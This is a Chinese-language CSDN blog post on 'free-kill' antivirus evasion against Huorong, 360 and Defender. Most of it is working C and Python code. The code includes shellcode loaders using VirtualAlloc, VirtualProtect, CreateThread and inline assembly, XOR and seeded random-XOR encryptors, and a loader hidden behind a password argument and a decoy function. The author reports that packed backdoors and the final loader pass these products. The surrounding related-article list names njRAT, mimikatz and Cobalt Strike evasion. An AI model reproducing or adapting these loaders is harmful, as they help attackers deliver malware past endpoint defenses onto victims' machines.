c语言免杀火绒

最新推荐文章于 2024-04-19 09:50:02 发布
最新推荐文章于 2024-04-19 09:50:02 发布
阅读量598 收藏 8
点赞数 2
分类专栏: # 渗透测试 文章标签: c语言 火绒安全 单片机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/134478152
版权

文章目录

前记

pyinstaller

pyinstaller目前已经被杀疯了,简单打包一个hello

a="hello"
print(a)

#pyinstaller -F -w b.py -n HipsMain.exe

在这里插入图片描述

考虑Nuitka

pip uninstall nuitka
pip install nuitka==
pip install nuitka==1.8.5
这里最新的1.8.5支持python3.11,因此将python环境切换到3.11
python -m nuitka --lto=no --onefile --standalone a.py
python -m nuitka  --onefile --standalone a.py

在这里插入图片描述

因此对后门打包建议使用nuitka,测试evilhiding项目的b.py用nuitka打包后可过火绒、360、defender

c语言

尝试c语言release出来的exe,可见c语言生成的exe是效果最好且体积最小,因此接下来探索c的免杀之路

在这里插入图片描述

c加载器

原生加载

#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")   //windows控制台程序不出黑窗口
int main()
{
    //方式一:指针执行
    //((void(*)(void)) & buf)();

    //方式二:强制类型转换
    //((void(WINAPI*)(void))&buf)();

    //方式三:申请动态内存加载
    //char* Memory;
    //Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    //memcpy(Memory, buf, sizeof(buf));
    //((void(*)())Memory)();

    //方式四:嵌入汇编加载
    unsigned char buf[] = "";
    void* p;
    VirtualProtect(buf,sizeof(buf),PAGE_EXECUTE_READWRITE,&p);
    _asm {
    lea eax,buf
    push eax
    ret
    }
    system("pause");

    //方式五:汇编花指令
    //__asm{
    //mov eax, offset shellcode
    //_emit 0xFF
    //_emit 0xE0
    //}
}

xor加密

def jiami(shellcode,num):
    shellcode.split('\\x')
    newcode=''
    for i in shellcode:
        base10 = ord(i) ^ num
        code_hex = hex(base10)
        code_hex = code_hex.replace('0x', '')
        if (len(code_hex) == 1):
            code_hex = '0' + code_hex
        newcode += '\\x' + code_hex
    print(newcode)

if __name__ == '__main__':
    shellcode=''
    num=int (input("num:"))
    jiami(shellcode,num)

#include <Windows.h>

// 入口函数
int wmain(int argc, TCHAR* argv[]) {

    int shellcode_size = 0; // shellcode长度
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄
    /* length: 800 bytes */

    unsigned char buf[] = "加密后的字符串";

    // 获取shellcode大小
    shellcode_size = sizeof(buf);

    /* 增加异或代码 */
    for (int i = 0; i < shellcode_size; i++) {
        buf[i] ^= 4;
    }
    /*
    VirtualAlloc(
        NULL, // 基址
        800,  // 大小
        MEM_COMMIT, // 内存页状态
        PAGE_EXECUTE_READWRITE // 可读可写可执行
        );
    */

    char* shellcode = (char*)VirtualAlloc(
        NULL,
        shellcode_size,
        MEM_COMMIT,
        PAGE_EXECUTE_READWRITE
    );
    // 将shellcode复制到可执行的内存页中
    CopyMemory(shellcode, buf, shellcode_size);

    hThread = CreateThread(
        NULL, // 安全描述符
        NULL, // 栈的大小
        (LPTHREAD_START_ROUTINE)shellcode, // 函数
        NULL, // 参数
        NULL, // 线程标志
        &dwThreadId // 线程ID
    );

    WaitForSingleObject(hThread, INFINITE); // 一直等待线程执行结束
    return 0;
}

敏感修改

  • 在 shellcode 读入时,申请一个普通的可写内存页,然后通过 VirtualProtect 加上可执行权限。
  • 用 InterlockedXorRelease 函数代替 ^(异或)。
    for (int i = 0; i < shellcode_size; i++) {
        Sleep(50);
        // buf[i] ^= 10;
        _InterlockedXor8(buf + i, 10);
    }
	char* shellcode = (char*)VirtualAlloc(
        NULL,
        shellcode_size,
        MEM_COMMIT,
        PAGE_READWRITE      // 只申请可写
    );
    //将 shellcode 复制到可执行的内存页中
    CopyMemory(shellcode, buf, shellcode_size);

    // 更改它的属性为可执行
    VirtualProtect(shellcode, shellcode_size, PAGE_EXECUTE, &dwOldProtect);

随机数异或加密

#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include<string.h>

int main() {
    unsigned char buf[] = "";    
    int a = 88;
    int len = sizeof(buf) - 1;
    unsigned char jiami[900];
    int b = 0;
    srand(a);
    for (int i = 0; i < len; i++) {
        b = rand() % 9 + 1;//1-9
        jiami[i] = b ^ buf[i];
        printf("\\x%x", jiami[i]);
    }
    system("pause");
    return 0;
}

#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include<string.h>
void jisuan(int i) {
    for (int j = 0; j < i; j++)
        printf("%d\n", j);
}
int main(int argc, char* argv[])
{
    if (argc == 2)
    {
        char k[] = "998";
        if (strcmp(argv[1],k)==0) {
            int a = 88;
            unsigned char jiemi[900] = { 0 };
            unsigned char jiami[900] = "";
            int len = sizeof(jiami) - 1;
            int b;
            srand(a);
            for (int i = 0; i < len; i++)
            {
                b = rand() % 9 + 1;//1-9
                jiemi[i] = jiami[i] ^ b;
            }
            void* p;
            VirtualProtect(jiemi, sizeof(jiemi), PAGE_EXECUTE_READWRITE, &p);
            _asm {
                lea eax, jiemi
                push eax
                ret
            }
            system("pause");
        }
        else {
            jisuan(88);
        }
    }
    else
    {
        jisuan(100);
    }
    return 0;
}

经过测试可过火绒

在这里插入图片描述

补充知识

windows杀死进程

taskkill /im {映像名称} /f
taskkill /pid {pid} /F

python调用c语言(Linux)

int add(int num1, int num2)
{
    return num1 + num2;
}

gcc c_dll.c -shared -o c_dll.so

from ctypes import *

if __name__ == '__main__':
    getso=cdll.LoadLibrary("./c_dll.so")
    print(getso.add(1,2))

文件转化为16进制打印

import binascii
print(binascii.b2a_hex(open("1.txt","rb").read()))
coleak
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
简单免杀火绒、360极速版
摔不死的笨鸟的博客
03-03 1797
免杀
c语言diy杀毒程序源代码,C语言作品→杀毒程序(原始版)
weixin_39968946的博客
05-17 1909
郁闷~~~发现了一个很让我郁闷的问题C语言中的输入函数连续使用 就会失效,不能中断程序等待输入 很郁闷 ···例如:scanf();下面是一个代码片段:#incude #include int mian(){char a,b,c;printf("请输入第一个字母:");scanf("%c",&a);printf("请输入第二个字母:");scanf("%c",&b);print...
绕过杀软(二)——免杀exe文件(360、火绒免杀
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
C语言与网络安全防护:防火墙规则编写、入侵检测与恶意软件分析(三)
最新发布
weixin_56154577的博客
04-19 749
入侵检测系统(Intrusion Detection System, IDS)是一种主动的安全防护措施,旨在实时监控网络或系统活动,通过分析数据流量、系统日志等信息,以识别并报告潜在的攻击行为、安全违规或异常现象。
exe免杀c语言,CobaltStrike shellcode免杀捆绑exe思路
weixin_31849185的博客
05-19 1438
这里演示的方式为shellcode框架加载自解压1.生成shellcode2.c加载(随便拉的加载器)#include #include #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")unsigned char shellcode[] ="\xfc\xe8\x89\x00\x00\x00\x60\...
c语言免杀程序源码,[原创]Window下基于C/C++源码免杀理论及思路(新手篇)
weixin_39531604的博客
05-18 869
作者:冷锋(LengF) –[BHST]博客:www.81sec.com 时间:2011-5-220x00 概述最近搞一个国外的网站,对方是用的赛门铁克的诺顿杀毒软件,而内网又只对外开放了80端口,于是就想着传个端口转发或者端口复用的工具上去,可是一上传就没了。既然已经提权了,又不想轻易放弃这台服务器。于是就想着怎么办了。自己对非源码的免杀不熟悉,于是就想到自己手头有类似于LCX的工具c...
c语言免杀程序源码,ghost源码免杀教程 步
weixin_39605647的博客
05-18 943
远控软件gh0st源码免杀2010-12-13 14:57远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控***,既然要利用,我们就做好源码基础上的***免杀工作。好久没有来博客了,我把免杀这部分整理了一下,先抛一砖头,有兴趣的朋友可以接着做,也可以和本人交流。序gh0st远控软件采用驱动级RESSDT过主动,svchost参数启动...
免费下载火绒安全.exe
05-19
免费下载火绒安全.exe
火绒安全软件的火绒规则(来源于互联网)
01-29
它可以拦截各类广告、弹窗、恶意下载以及潜在的危险行为,保护用户的电脑免受不必要的打扰和可能的损害。火绒拦截规则涵盖了网络请求、程序行为、注册表操作等多个方面,确保在不影响正常使用的前提下,阻止不良程序...
用python制作免杀软件教程及工具.zip
07-26
在IT安全领域,免杀软件是指能够绕过安全软件检测的恶意程序,通常用于渗透测试或防御演练。本文将基于提供的资源,详细讲解如何利用Python来制作免杀软件,以及涉及的相关知识点。 首先,"py2exe-0.6.9.win32-py...
火绒3.0版本,需要自取
09-06
火绒是一款广受好评的国产安全软件,以其轻量级、高效能和低资源占用而著名。火绒3.0版本是该软件的一个较早版本,尽管它可能没有最新的功能和安全更新,但对于某些用户来说,可能由于兼容性或者特定需求而选择使用...
C++ 编写的杀毒软件
01-17
利用Visual C++ 编写的杀毒软件,中文介面
病毒加壳免杀工具之Themida
01-11
Theminda加壳工具的使用是比较简单的,同时它的免杀效率也比较高,将病毒用其加壳之后,能够通过火绒等非主流防毒软件的杀毒,缺点是无法通过360等主流防毒软件。 优点: 代码混淆: Themida通过使用代码混淆技术,...
免杀火绒
sash1mi
02-04 2310
免杀火绒 接上篇文章《免杀过360全家桶》 https://blog.csdn.net/weixin_46676743/article/details/113350500 1.cs建立监听 2.生成payload 3.将生成的payload放到kali里编译 4.FourEye编译 项目地址与具体使用方法: https://github.com/lengjibo/FourEye 注意:一定要按照此工具的编译规则install gcc!! 5.火绒查杀 360查杀 6.cs上线 .
mimikatz免杀过360和火绒
qq_44905657的博客
12-28 2076
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。 1、免杀方式 对mimikatz我们进行源码免杀。源码免杀只需要定位源码中的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、免杀处理 我们访问https://github.com/genti
c语言免杀程序源码,【程序源码】用纯C语言实现坦克大战
weixin_30663839的博客
05-18 202
/* time:2017/1/15 *//* edit:www.dotcpp.com */#include#include#include#include#include#define KEY_ESC 0x01#define KEY_SPACE 0x39#define KEY_UP 0x48#define KEY_LEFT 0x4b#define KEY_RIGHT 0x4d#define KEY...
c语言免杀程序源码,Window下基于C/C++源码免杀理论及思路(新手篇)
weixin_30427953的博客
05-18 837
作者:冷锋(LengF)[BHST]博客:www.81sec.com时间:2011-5-220x00概述最近搞一个国外的网站,对方是用的赛门铁克的诺顿杀毒软件,而内网又只对外开放了80端口,于是就想着传个端口转发或者端口复用的工具上去,可是一上传就没了。既然已经提权了,又不想轻易放弃这台服务器。于是就想着怎么办了。自己对非源码的免杀不熟悉,于是就想到自己手头有类似于LCX的工具c源...
免杀知识汇总
goddemon
09-08 6802
veil工具基础使用+进阶 ①启动方法 ①cd /opt ② ls ③veil(运行veil即可) 使用方法 如 生成go语言的免杀马 use 16 set lhost ip set lport 端口 generate#(执行即可) ②结合cs进行免杀 实操(生成go语言的免杀马) ①cs使用生成一个go语言类型的payload ②use 17 ③需要的设置变量类(具体参数设置的含义) BADMACS 设置为Y表示 查看运行环境的MAC地址如果不是虚拟机才会执行payload (反调试) CLICKT
Python免杀火绒、360和Defender
热门推荐
江左盟的博客
10-10 2万+
目录 简介 环境 原理 加载ShellCode 定位特征码 Base64编码绕过 简介 之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的免杀方法,最近学习并实践发现绕过国内的杀毒软件貌似并不难,本文使用手工分析特征码,使用base64编码绕过杀毒软件静态分析。虽然使用的方法比较简单,但对实际做免杀免杀研究还是有一定意义的。 环境 Windows 10 x64 Python 3.8.3 Pyinstaller 火绒版本:5.0..
kali木马免杀火绒
10-07
k木马免杀火绒是指在kali系统中使用火绒进行木马免杀的操作。火绒是一款知名的安全防护软件,可以帮助检测和阻止恶意软件的运行。然而,针对火绒免杀技术是不断发展和变化的,所以具体的免杀方法可能会有所不同。在使用kali进行木马免杀时,您可以尝试以下方法: 1. 使用加壳工具:加壳工具可以将木马程序进行加密和混淆,从而绕过火绒的检测。您可以使用工具如shelter来对木马程序进行加壳操作,以增加木马的免杀能力。 2. 修改木马特征:火绒通常会根据木马程序的特征进行识别和拦截,所以您可以修改木马的特征,使其不易被火绒检测到。例如,您可以修改木马的关键函数或变量名称,或者使用代码混淆技术来增加木马的免杀能力。 3. 使用免杀工具:kali系统中有一些专门用于木马免杀的工具,您可以尝试使用这些工具来生成免杀的木马程序。例如,您可以使用powerstager等工具来生成免杀的木马,然后再进行火绒的测试。 总之,木马免杀是一个不断演进和变化的领域,没有绝对的免杀方法。在进行免杀操作时,建议您时刻关注最新的免杀技术和工具,并保持对火绒等防护软件的了解,以提高木马的免杀能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值